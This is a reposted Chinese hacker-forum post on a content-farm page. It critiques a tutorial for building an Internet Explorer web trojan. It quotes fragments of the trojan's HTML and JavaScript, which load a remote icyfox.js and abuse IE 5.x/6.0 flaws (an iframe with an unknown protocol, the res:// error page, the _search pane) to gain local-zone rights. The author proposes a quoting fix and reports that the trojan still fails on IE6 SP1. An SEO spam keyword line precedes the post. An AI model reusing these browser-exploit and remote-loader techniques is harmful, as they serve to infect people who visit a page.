亚洲一区亚洲二区亚洲三区,国产成人高清在线,久久久精品成人免费看,999久久久免费精品国产牛牛,青草视频在线观看完整版,狠狠夜色午夜久久综合热91,日韩精品视频在线免费观看

“打造完美IE木馬”的紕漏 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【www.ishadingyu.com - 電腦資料】

    來源:黑基論壇

    都原創(chuàng)偶也原創(chuàng),嘿嘿

    “打造完美的IE網(wǎng)頁木馬”-------http://bbs.hackbase.com/viewthread.php?tid=2705719&fpage=1

    這篇精華大家都看了吧,有人說很好收藏了,有人說根本沒用,

“打造完美IE木馬”的紕漏

。這到底行不行呢?

    現(xiàn)在我來說說我實(shí)驗(yàn)后的看法:

    我們按他說的做:一個(gè)HTM,一個(gè)JS。大家看愿文的HTM部分:

    ============================================

   

   

   

    冰狐浪子網(wǎng)絡(luò)技術(shù)實(shí)驗(yàn)室的完美IE網(wǎng)頁木馬

   

   

   

   

    //此處設(shè)置上面icyfox.js文件的網(wǎng)絡(luò)地址

    //請(qǐng)把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實(shí)際上傳地址

    jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);

    WIE=navigator.appVersion;

    if(WIE.indexOf("MSIE 5.0")>-1){

    /*IE 5.0利用iframe標(biāo)簽,src屬性設(shè)為icyfox://則會(huì)使此標(biāo)簽具備“我的電腦”域的權(quán)限,原因是因?yàn)閕cyfox://是不存在的協(xié)議,所以會(huì)IE會(huì)利用res://協(xié)議打開SHDOCLC.DLL中的語法錯(cuò)誤頁syntax.htm,而且SHDOCLC.DLL又位于系統(tǒng)目錄中,為在 icyfox.js中得到WINDOWS系統(tǒng)目錄和系統(tǒng)盤提供數(shù)據(jù);*/

    document.write("<\/iframe.>");

    setTimeout("muma0()",1000);

    }

    else {

    ===================================

    大家看這里

    原文中  “//請(qǐng)把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實(shí)際上傳地址

    jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);  “  最后的replace(/\//g,’//’); 我想可能是作者的失誤,要不就是我的機(jī)器問題了,如果直接打開這個(gè)HTM是不會(huì)想作者說的引用icyfox.js的,這里有點(diǎn)小問題--------replace(/\//g,’//’);這句話的意思是把全部的”/“用”//“取代,

電腦資料

“打造完美IE木馬”的紕漏》(http://www.ishadingyu.com)。這里應(yīng)該該為-----replace(/\//g,“//”);看出區(qū)別了嗎? 把單撇該為引號(hào), 否則瀏覽器是會(huì)報(bào)錯(cuò)而不能轉(zhuǎn)向ICYFOX.JS

    改了后IE自動(dòng)打開 icyfox/// (如果你是沒改JS文件名的話)

    我是IE6.0SP1,還是打不開木馬程序。作者說“/*IE 5.0利用iframe標(biāo)簽,src屬性設(shè)為icyfox://則會(huì)使此標(biāo)簽具備“我的電腦”域的權(quán)限,原因是因?yàn)閕cyfox://是不存在的協(xié)議,所以會(huì)IE會(huì)利用res://協(xié)議打開SHDOCLC.DLL中的語法錯(cuò)誤頁syntax.htm,而且SHDOCLC.DLL又位于系統(tǒng)目錄中,為在 icyfox.js中得到WINDOWS系統(tǒng)目錄和系統(tǒng)盤提供數(shù)據(jù);*/ ”“/*IE5.5、 IE6.0則利用_search漏洞,把打開的地址設(shè)為icyfox://,從而使_search搜索框具備“我的電腦”域的權(quán)限,因?yàn)樵贗E6.0中無法用上面的iframe漏洞,IE5.5應(yīng)該可以用,我沒有測(cè)試。這樣做的結(jié)果會(huì)打開搜索欄,有點(diǎn)遺憾!*/ ”

    我沒法實(shí)驗(yàn),我的瀏覽起并沒用res://協(xié)議打開也沒打開搜索欄,用Microsoft.XMLHTTP控件也不成功。

    就是這些,希望我說的是對(duì)的,給實(shí)驗(yàn)的朋友一些幫助,呵呵

最新文章